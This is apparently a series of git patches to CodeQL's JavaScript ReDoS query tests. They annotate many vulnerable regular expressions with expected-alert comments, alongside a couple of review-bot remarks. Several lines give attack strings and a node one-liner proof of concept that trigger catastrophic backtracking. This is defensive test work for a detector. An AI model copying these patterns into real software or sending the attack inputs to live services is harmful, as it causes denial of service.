-/^(([a-zA-Z]:|\\)\\)?(((\.)|(\.\.)|([^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?))\\)*[^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?$/g; +/^(([a-zA-Z]:|\\)\\)?(((\.)|(\.\.)|([^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?))\\)*[^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?$/g; // $ Alert[js/redos] /\u00A3/g; /^([a-z0-9]{32})$/g; /[:]{1}[-~+o]?[)>]+/g; @@ -76,7 +76,7 @@ /(AUX|PRN|NUL|COM\d|LPT\d)+\s*$/g; /^[a-zA-Z]{1,2}[0-9][0-9A-Za-z]{0,1} {0,1}[0-9][A-Za-z]{2}$/g; /\d{4}-?\d{4}-?\d{4}-?\d{4}/g; -/^(\/w|\/W|[^<>+?$%{}&])+$/g; +/^(\/w|\/W|[^<>+?$%{}&])+$/g; // $ Alert[js/redos] /([0-1][0-9]|2[0-3]):[0-5][0-9]/g; /([A-Zäöü0-9\/][^a-z\:\,\(\)]*[A-Zäöü0-9])($|[\.\:\,\;\)\-\ \+]|s\b)/g; /^[\u0081-\uFFFF]{1,}$/g; 
@@ -87,7 +87,7 @@ /^(?n:(?!-[\d\,]*K) (?!-((\d{1,3},)*((([3-9]\d\d|2[89]\d|27[4-9])\xB0C)|(((4[6-9]|[5-9]\d)\d)\xB0F)))) -?\d{1,3}(,\d{3})*(\xB0[CF]|K) )$/g; /^[+]447\d{9}$/g; /[1-2][0|9][0-9]{2}[0-1][0-9][0-3][0-9][-][0-9]{4}/g; -/^(([a-z])+.)+[A-Z]([a-z])+$/g; +/^(([a-z])+.)+[A-Z]([a-z])+$/g; // $ Alert[js/redos] /(?-i:\b\p{Lu}+\b)/g; /^(\d{5}((|-)-\d{4})?)|([A-Za-z]\d[A-Za-z][\s\.\-]?(|-)\d[A-Za-z]\d)|[A-Za-z]{1,2}\d{1,2}[A-Za-z]? \d[A-Za-z]{2}$/g; /(.*\.([wW][mM][aA])|([mM][pP][3])$)/g; @@ -120,7 +120,7 @@ /^(.|\n){0,16}$/g; /\p{N}/g; /^[a-zA-Z0-9]{1,20}$/g; -/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; +/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; // $ Alert[js/redos] /^[^#]([^ ]+ ){6}[^ ]+$/g; /^[AaWaKkNn][a-zA-Z]?[0-9][a-zA-Z]{1,3}$/g; /^[a-z]+[0-9]*[a-z]+$/g; @@ -139,13 +139,13 @@ /^[0-9]{2}[-][0-9]{2}[-][0-9]{2}$/g; /^\(?082|083|084|072\)?[\s-]?[\d]{3}[\s-]?[\d]{4}$/g; /(\{\\f\d*)\\([^;]+;)/g; -/^(\/w|\/W|[^<>+?$%{}&])+$/g; +/^(\/w|\/W|[^<>+?$%{}&])+$/g; // $ Alert[js/redos] /^\(\d{1,2}(\s\d{1,2}){1,2}\)\s(\d{1,2}(\s\d{1,2}){1,2})((-(\d{1,4})){0,1})$/g; /(("|')[a-z0-9\/\.\?\=\&]*(\.htm|\.asp|\.php|\.jsp)[a-z0-9\/\.\?\=\&]*("|'))|(href=*?[a-z0-9\/\.\?\=\&"']*)/g; /^]*)>(.*?(?=<\/a>))<\/a>$/g; /^[0-9A-Za-z_ ]+(.[jJ][pP][gG]|.[gG][iI][fF])$/g; /^(?(^00000(|-0000))|(\d{5}(|-\d{4})))$/g; -/\w?<\s?\/?[^\s>]+(\s+[^"'=]+(=("[^"]*")|('[^\']*')|([^\s"'>]*))?)*\s*\/?>/g; +/\w?<\s?\/?[^\s>]+(\s+[^"'=]+(=("[^"]*")|('[^\']*')|([^\s"'>]*))?)*\s*\/?>/g; // $ Alert[js/redos] /^([A-PR-UWYZ0-9][A-HK-Y0-9][AEHMNPRTVXY0-9]?[ABEHMNPRVWXY0-9]? {1,2}[0-9][ABD-HJLN-UW-Z]{2}|GIR 0AA)$/g; /^([ \u00c0-\u01ffa-zA-Z'])+$/g; /[^abc]/g; @@ -170,4 +170,4 @@ /(?-i:\b\p{Lu}+\b)/g; /^[+]447\d{9}$/g; /[1-2][0|9][0-9]{2}[0-1][0-9][0-3][0-9][-][0-9]{4}/g; -/^(([a-z])+.)+[A-Z]([a-z])+$/g; +/^(([a-z])+.)+[A-Z]([a-z])+$/g; // $ Alert[js/redos] 
diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/strings.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/strings.js index 888f1f5fb7dc..f4ebd5b8de9e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/strings.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/strings.js @@ -16,7 +16,7 @@ /^(?=[^\d_].*?\d)\w(\w|[!@#$%]){7,20}/g; /^([A-Z|a-z|&]{3}\d{2}((0[1-9]|1[012])(0[1-9]|1\d|2[0-8])|(0[13456789]|1[012])(29|30)|(0[13578]|1[02])31)|([02468][048]|[13579][26])0229)(\w{2})([A|a|0-9]{1})$|^([A-Z|a-z]{4}\d{2}((0[1-9]|1[012])(0[1-9]|1\d|2[0-8])|(0[13456789]|1[012])(29|30)|(0[13578]|1[02])31)|([02468][048]|[13579][26])0229)((\w{2})([A|a|0-9]{1})){0,3}$/g; /^((4\d{3})|(5[1-5]\d{2})|(6011))-?\d{4}-?\d{4}-?\d{4}|3[4,7]\d{13}$/g; -/^[\.\wæøå-]+@([a-zæøå0-9]+([\.-]{0,1}[a-zæøå0-9]+|[a-zæøå0-9]?))+\.[a-z]{2,6}$/g; +/^[\.\wæøå-]+@([a-zæøå0-9]+([\.-]{0,1}[a-zæøå0-9]+|[a-zæøå0-9]?))+\.[a-z]{2,6}$/g; // $ Alert[js/redos] /"((\\")|[^"(\\")])+"/g; /<[^>]+>/g; /^(?n:(?(St\.\ )?(?-i:[A-Z]\'?\w+?\-?)+)(?\ (?i:([JS]R)|((X(X{1,2})?)?((I((I{1,2})|V|X)?)|(V(I{0,3})))?)))?,((?Dr|Prof|M(r?|(is)?)s)\ )?(?(?-i:[A-Z]\'?(\w+?|\.)\ ??){1,2})?(\ (?(?-i:[A-Z])(\'?\w+?|\.))){0,2})$/g; 
@@ -44,17 +44,17 @@ /^([4]{1})([0-9]{12,15})$/g; /^([34|37]{2})([0-9]{13})$/g; /^([A-Z]{3}\s?(\d{3}|\d{2}|d{1})\s?[A-Z])|([A-Z]\s?(\d{3}|\d{2}|\d{1})\s?[A-Z]{3})|(([A-HK-PRSVWY][A-HJ-PR-Y])\s?([0][2-9]|[1-9][0-9])\s?[A-HJ-PR-Z]{3})$/g; -/(\S*)+(\u007C)+(\S*)/g; +/(\S*)+(\u007C)+(\S*)/g; // $ Alert[js/redos] /([^\.\?\!]*)[\.\?\!]/g; /(\S+)\x20{2,}(?=\S+)/g; /^([6011]{4})([0-9]{12})$/g; /^([30|36|38]{2})([0-9]{12})$/g; /^(?!000)(?!666)(?[0-6]\d{2}|7(?:[0-6]\d|7[012]))([- ]?)(?!00)(?\d\d)\1(?!0000)(?\d{4})$/g; -/^([a-z0-9]+([\-a-z0-9]*[a-z0-9]+)?\.){0,}([a-z0-9]+([\-a-z0-9]*[a-z0-9]+)?){1,63}(\.[a-z0-9]{2,7})+$/g; +/^([a-z0-9]+([\-a-z0-9]*[a-z0-9]+)?\.){0,}([a-z0-9]+([\-a-z0-9]*[a-z0-9]+)?){1,63}(\.[a-z0-9]{2,7})+$/g; // $ Alert[js/redos] /(NOT)?(\s*\(*)\s*(\w+)\s*(=|<>|<|>|LIKE|IN)\s*(\(([^\)]*)\)|'([^']*)'|(-?\d*\.?\d+))(\s*\)*\s*)(AND|OR)?/g; /^[0-9]{1,}(,[0-9]+){0,}$/g; /^(?!^(PRN|AUX|CLOCK\$|NUL|CON|COM\d|LPT\d|\..*)(\..+)?$)[^\x00-\x1f\\?*<>:\;|\"/]+$/g; -/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; +/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; // $ Alert[js/redos] /^([1-9]{1}[0-9]{3}[,]?)*([1-9]{1}[0-9]{3})$/g; /^(?=((0[1-9]0)|([1-7][1-7]\d)|(00[1-9])|(0[1-9][1-9]))-(?=(([1-9]0)|(0[1-9])|([1-9][1-9]))-(?=((\d{3}[1-9])$|([1-9]\d{3})$|(\d[1-9]\d{2})$|(\d{2}[1-9]\d)$))))/g; /(\b\w+\b)/g; @@ -78,7 +78,7 @@ /^(\d{4}-){3}\d{4}$|^(\d{4} ){3}\d{4}$|^\d{16}$/g; /^(?[^,]+),(?[^,]+),(?[^,]+)$/g; /^(([a-h,A-H,j-n,J-N,p-z,P-Z,0-9]{9})([a-h,A-H,j-n,J-N,p,P,r-t,R-T,v-z,V-Z,0-9])([a-h,A-H,j-n,J-N,p-z,P-Z,0-9])(\d{6}))$/g; -/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; +/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; // $ Alert[js/redos] /(NOT)?(\s*\(*)\s*(\w+)\s*(=|<>|<|>|LIKE|IN)\s*(\(([^\)]*)\)|'([^']*)'|(-?\d*\.?\d+))(\s*\)*\s*)(AND|OR)?/g; /^[0-9]{1,}(,[0-9]+){0,}$/g; /^([4]{1})([0-9]{12,15})$/g; 
@@ -88,4 +88,4 @@ /([^\.\?\!]*)[\.\?\!]/g; /(\S+)\x20{2,}(?=\S+)/g; /^([A-Z]{3}\s?(\d{3}|\d{2}|d{1})\s?[A-Z])|([A-Z]\s?(\d{3}|\d{2}|\d{1})\s?[A-Z]{3})|(([A-HK-PRSVWY][A-HJ-PR-Y])\s?([0][2-9]|[1-9][0-9])\s?[A-HJ-PR-Z]{3})$/g; -/(\S*)+(\u007C)+(\S*)/g; +/(\S*)+(\u007C)+(\S*)/g; // $ Alert[js/redos] diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/uri.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/uri.js index 90d83b56ad3d..29ce77334563 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/uri.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/uri.js 
@@ -1,8 +1,8 @@ /^(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9])\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[0-9])$/g; /(http|ftp|https):\/\/[\w\-_]+(\.[\w\-_]+)+([\w\-\.,@?^=%&:/~\+#]*[\w\-\@?^=%&/~\+#])?/g; -/(?:(?http(?:s?)|ftp)(?:\:\/\/)) (?:(?\w+\:\w+)(?:\@))? (?[^/\r\n\:]+)? (?\:\d+)? (?(?:\/.*)*\/)? (?.*?\.(?\w{2,4}))? (?\??(?:\w+\=[^\#]+)(?:\&?\w+\=\w+)*)* (?\#.*)?/g; +/(?:(?http(?:s?)|ftp)(?:\:\/\/)) (?:(?\w+\:\w+)(?:\@))? (?[^/\r\n\:]+)? (?\:\d+)? (?(?:\/.*)*\/)? (?.*?\.(?\w{2,4}))? (?\??(?:\w+\=[^\#]+)(?:\&?\w+\=\w+)*)* (?\#.*)?/g; // $ Alert[js/redos] /^[^\\\/\?\*\"\'\>\<\:\|]*$/g; -/^(([a-zA-Z]:)|(\\{2}\w+)\$?)(\\(\w[\w ]*.*))+\.(txt|TXT)$/g; +/^(([a-zA-Z]:)|(\\{2}\w+)\$?)(\\(\w[\w ]*.*))+\.(txt|TXT)$/g; // $ Alert[js/redos] /(?!\.)[a-z]{1,4}$/g; /^([a-zA-Z]\:) (\\{1}| ((\\{1}) [^\\] ([^/:*?<>"|]*(?|]?$/g; -/^[a-z]+([a-z0-9-]*[a-z0-9]+)?(\.([a-z]+([a-z0-9-]*[a-z0-9]+)?)+)*$/g; +/^[a-z]+([a-z0-9-]*[a-z0-9]+)?(\.([a-z]+([a-z0-9-]*[a-z0-9]+)?)+)*$/g; // $ Alert[js/redos] /(.*?)<\/a>/g; /^[^\\\./:\*\?\"<>\|]{1}[^\\/:\*\?\"<>\|]{0,254}$/g; /^[a-zA-Z0-9]+([a-zA-Z0-9\-\.]+)?\.(aero|biz|com|coop|edu|gov|info|int|mil|museum|name|net|org|ac|ad|ae|af|ag|ai|al|am|an|ao|aq|ar|as|at|au|aw|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cs|cu|cv|cx|cy|cz|de|dj|dk|dm|do|dz|ec|ee|eg|eh|er|es|et|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly| ma|mc|md|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk| pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr| 
st|su|sv|sy|sz|tc|td|tf|tg|th|tj|tk|tm|tn|to|tp|tr|tt|tv|tw|tz|ua|ug|uk|um|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|yu|za|zm|zr|zw|AERO|BIZ|COM|COOP|EDU|GOV|INFO|INT|MIL|MUSEUM|NAME|NET|ORG|AC|/g; @@ -52,7 +52,7 @@ /9[0-9]/g; /([^\=&]+)(?|]?$/g; /^((\d|\d\d|[0-1]\d\d|2[0-4]\d|25[0-5])\.(\d|\d\d|[0-1]\d\d|2[0-4]\d|25[0-5])\.(\d|\d\d|[0-1]\d\d|2[0-4]\d|25[0-5])\.(\d|\d\d|[0-1]\d\d|2[0-4]\d|25[0-5]))$/g; /((http\:\/\/|https\:\/\/|ftp\:\/\/)|(www.))+(([a-zA-Z0-9\.-]+\.[a-zA-Z]{2,4})|([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}))(\/[a-zA-Z0-9%:/-_\?\.'~]*)?/g; 
@@ -60,7 +60,7 @@ /^(ht|f)tp((?<=http)s)?:\/\/((?<=http:\/\/)www|(?<=https:\/\/)www|(?<=ftp:\/\/)ftp)\.(([a-z][0-9])|([0-9][a-z])|([a-z0-9][a-z0-9\-]{1,2}[a-z0-9])|([a-z0-9][a-z0-9\-](([a-z0-9\-][a-z0-9])|([a-z0-9][a-z0-9\-]))[a-z0-9\-]*[a-z0-9]))\.(co|me|org|ltd|plc|net|sch|ac|mod|nhs|police|gov)\.uk$/g; /^DOMAIN\\\w+$/g; /^(http|https|ftp)\:\/\/([a-zA-Z0-9\.\-]+(\:[a-zA-Z0-9\.&%\$\-]+)*@)*((25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9])\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[0-9])|localhost|([a-zA-Z0-9\-]+\.)*[a-zA-Z0-9\-]+\.(com|edu|gov|int|mil|net|org|biz|arpa|info|name|pro|aero|coop|museum|[a-zA-Z]{2}))(\:[0-9]+)*(\/($|[a-zA-Z0-9\.\,\?\'\\\+&%\$#\=~_\-]+))*$/g; -/^(http|https|ftp)\:\/\/([a-zA-Z0-9\.\-]+(\:[a-zA-Z0-9\.&%\$\-]+)*@)?((25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9])\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[0-9])|([a-zA-Z0-9\-]+\.)*[a-zA-Z0-9\-]+\.[a-zA-Z]{2,4})(\:[0-9]+)?(\/[^/][a-zA-Z0-9\.\,\?\'\\/\+&%\$#\=~_\-@]*)*$/g; +/^(http|https|ftp)\:\/\/([a-zA-Z0-9\.\-]+(\:[a-zA-Z0-9\.&%\$\-]+)*@)?((25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9])\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[0-9])|([a-zA-Z0-9\-]+\.)*[a-zA-Z0-9\-]+\.[a-zA-Z]{2,4})(\:[0-9]+)?(\/[^/][a-zA-Z0-9\.\,\?\'\\/\+&%\$#\=~_\-@]*)*$/g; // $ Alert[js/redos] /^\\{2}[\w-]+\\(([\w-][\w-\s]*[\w-]+[$$]?$)|([\w-][$$]?$))/g; /(^[a-zA-Z0-9]+:\/\/)/g; /^http:\/\/([a-zA-Z0-9_\-]+)([\.][a-zA-Z0-9_\-]+)+([/][a-zA-Z0-9\~\(\)_\-]*)+([\.][a-zA-Z0-9\(\)_\-]+)*$/g; From 607b184a7f9ec468e617a832541afb7465fe887a Mon Sep 17 00:00:00 2001 
From: Asger F Date: Fri, 21 Feb 2025 09:58:15 +0100 Subject: [PATCH 085/892] JS: Fix a bug in test case --- javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index 55b173b0f779..455db4f86e93 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js @@ -102,7 +102,7 @@ var bad24 = /(?:=(?:([!#\$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+)|"((?:\\[\x00-\x7f]|[^\x var bad25 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"/; // $ Alert -var bad26 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"\\])*)"/; +var fix25 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"\\])*)"/; // OK - fixed version of bad25 var bad27 = /(([a-z]|[d-h])*)"/; // $ Alert From 082e16b3d31f679eaf4a31ef0bf776cf76328a88 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 09:58:56 +0100 Subject: [PATCH 086/892] JS: More Alert comments in ReDoS/tst.js based on variable naming Again just trying to translate the original intent behind the test, without taking actual query results into account --- .../query-tests/Security/CWE-400/ReDoS/tst.js | 48 +++++++++---------- 1 file changed, 23 insertions(+), 25 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index 455db4f86e93..735d45ea6cc1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js 
@@ -41,24 +41,22 @@ var good4 = /(\r\n|\r|\n)+/; // BAD - PoC: `node -e "/((?:[^\"\']|\".*?\"|\'.*?\')*?)([(,)]|$)/.test(\"'''''''''''''''''''''''''''''''''''''''''''''\\\"\");"`. It's complicated though, because the regexp still matches something, it just matches the empty-string after the attack string. var actuallyBad = /((?:[^"']|".*?"|'.*?')*?)([(,)]|$)/; -// NOT GOOD; attack: "a" + "[]".repeat(100) + ".b\n" // Adapted from Knockout (https://github.com/knockout/knockout), which is // licensed under the MIT license; see file knockout-LICENSE -var bad6 = /^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$/i; +var bad6 = /^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$/i; // $ Alert - attack: "a" + "[]".repeat(100) + ".b\n" var good6 = /(a|.)*/; // Testing the NFA - only some of the below are detected. -var bad7 = /^([a-z]+)+$/; -var bad8 = /^([a-z]*)*$/; -var bad9 = /^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/; -var bad10 = /^(([a-z])+.)+[A-Z]([a-z])+$/; +var bad7 = /^([a-z]+)+$/; // $ Alert +var bad8 = /^([a-z]*)*$/; // $ Alert +var bad9 = /^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/; // $ Alert +var bad10 = /^(([a-z])+.)+[A-Z]([a-z])+$/; // $ Alert -// NOT GOOD; attack: "[" + "][".repeat(100) + "]!" // Adapted from Prototype.js (https://github.com/prototypejs/prototype), which // is licensed under the MIT license; see file Prototype.js-LICENSE. -var bad11 = /(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/; +var bad11 = /(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/; // $ Alert - attack: "[" + "][".repeat(100) + "]!" // Adapted from Prism (https://github.com/PrismJS/prism), which is licensed // under the MIT license; see file Prism-LICENSE. 
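Review bot: The context comment `// Testing the NFA - only some of the below are detected.` no longer agrees with the lines under it, since `bad7` through `bad10` each now carry `// $ Alert`. Either the comment is stale and can become `// Testing the NFA.`, or the patterns the query does not flag should read `// $ MISSING: Alert`, as `bad86AndAHalf` does further down the file. The commit message says actual query results were not consulted, so which of the two holds needs checking against a test run.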
@@ -279,11 +277,11 @@ var bad78 = /^(b+.)+$/; // $ Alert var good39 = /a*b/; -// All 4 bad combinations of nested * and + -var bad79 = /(a*)*b/; -var bad80 = /(a+)*b/; -var bad81 = /(a*)+b/; -var bad82 = /(a+)+b/; +// All 4 bad combinations of nested * and +) +var bad79 = /(a*)*b/; // $ Alert +var bad80 = /(a+)*b/; // $ Alert +var bad81 = /(a*)+b/; // $ Alert +var bad82 = /(a+)+b/; // $ Alert var good40 = /(a|b)+/; 
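Review bot: The rewritten comment line picks up a stray closing parenthesis: `// All 4 bad combinations of nested * and +)`. The original text `// All 4 bad combinations of nested * and +` should stay as it was. Only the four lines `bad79` to `bad82` need the added `// $ Alert`.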
@@ -300,45 +298,45 @@ var bad86AndAHalf = /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/; // $ MISSING: Alert var good43 = /("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)/g; var bad87 = /("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)X/g; // $ Alert -var bad88 = /("[^"]*?"|[^"\s]+)+(?=X)/g; -var bad89 = /(x*)+(?=$)/ -var bad90 = /(x*)+(?=$|y)/ +var bad88 = /("[^"]*?"|[^"\s]+)+(?=X)/g; // $ Alert +var bad89 = /(x*)+(?=$)/ // $ Alert +var bad90 = /(x*)+(?=$|y)/ // $ Alert // OK - but we spuriously conclude that a rejecting suffix exists. var good44 = /([\s\S]*)+(?=$)/; var good45 = /([\s\S]*)+(?=$|y)/; var good46 = /(foo|FOO)*bar/; -var bad91 = /(foo|FOO)*bar/i; +var bad91 = /(foo|FOO)*bar/i; // $ Alert var good47 = /([AB]|[ab])*C/; -var bad92 = /([DE]|[de])*F/i; +var bad92 = /([DE]|[de])*F/i; // $ Alert -var bad93 = /(?<=^v?|\sv?)(a|aa)*$/; -var bad94 = /(a|aa)*$/; +var bad93 = /(?<=^v?|\sv?)(a|aa)*$/; // $ Alert +var bad94 = /(a|aa)*$/; // $ Alert var bad95 = new RegExp( "(a" + "|" + "aa)*" + "b$" -); +); // $ Alert var bad96 = new RegExp("(" + "(c|cc)*|" + "(d|dd)*|" + "(e|ee)*" + -")f$"); +")f$"); // $ Alert var bad97 = new RegExp( "(g|gg" + - ")*h$"); + ")*h$"); // $ Alert -var bad98 = /^(?:\*\/\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}\/(?:\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126})(?:\s* *; *[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}(?:="?[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}"?)?\s*)*)$/; +var bad98 = /^(?:\*\/\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}\/(?:\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126})(?:\s* *; *[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}(?:="?[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}"?)?\s*)*)$/; // $ Alert var good48 = /(\/(?:\/[\w.-]*)*){0,1}:([\w.-]+)/; -var bad99 = /(a{1,})*b/; +var bad99 = /(a{1,})*b/; // $ Alert var unicode = /^\n\u0000(\u0000|.)+$/; From 266ac0963773318799a6ac9429de8b643ddf327e Mon Sep 17 00:00:00 2001 
From: Asger F Date: Fri, 21 Feb 2025 14:29:18 +0100 Subject: [PATCH 087/892] JS: Add query iDs --- .../query-tests/Security/CWE-400/ReDoS/tst.js | 194 +++++++++--------- 1 file changed, 97 insertions(+), 97 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index 735d45ea6cc1..6be96967a643 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js @@ -1,6 +1,6 @@ // Adapted from marked (https://github.com/markedjs/marked), which is licensed // under the MIT license; see file marked-LICENSE. -var bad1 = /^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)/; // $ Alert - attack: "_" + "__".repeat(100) +var bad1 = /^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)/; // $ Alert[js/redos] - attack: "_" + "__".repeat(100) // Adapted from marked (https://github.com/markedjs/marked), which is licensed @@ -14,7 +14,7 @@ var good2 = /(.*,)+.+/; // Adapted from CodeMirror (https://github.com/codemirror/codemirror), // which is licensed under the MIT license; see file CodeMirror-LICENSE. -var bad2 = /^(?:\s+(?:"(?:[^"\\]|\\\\|\\.)+"|'(?:[^'\\]|\\\\|\\.)+'|\((?:[^)\\]|\\\\|\\.)+\)))?/; // $ Alert - attack: " '" + "\\\\".repeat(100) +var bad2 = /^(?:\s+(?:"(?:[^"\\]|\\\\|\\.)+"|'(?:[^'\\]|\\\\|\\.)+'|\((?:[^)\\]|\\\\|\\.)+\)))?/; // $ Alert[js/redos] - attack: " '" + "\\\\".repeat(100) // Adapted from lulucms2 (https://github.com/yiifans/lulucms2). 
@@ -25,117 +25,117 @@ var good2 = /\(\*(?:[\s\S]*?\(\*[\s\S]*?\*\))*[\s\S]*?\*\)/; // under the MIT license; see file jest-LICENSE. var good3 = /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*/; -var bad4 = /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)a/; // $ Alert - variant of good3; attack: "a|\n:|\n" + "||\n".repeat(100) +var bad4 = /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)a/; // $ Alert[js/redos] - variant of good3; attack: "a|\n:|\n" + "||\n".repeat(100) // Adapted from ANodeBlog (https://github.com/gefangshuai/ANodeBlog), // which is licensed under the Apache License 2.0; see file ANodeBlog-LICENSE. 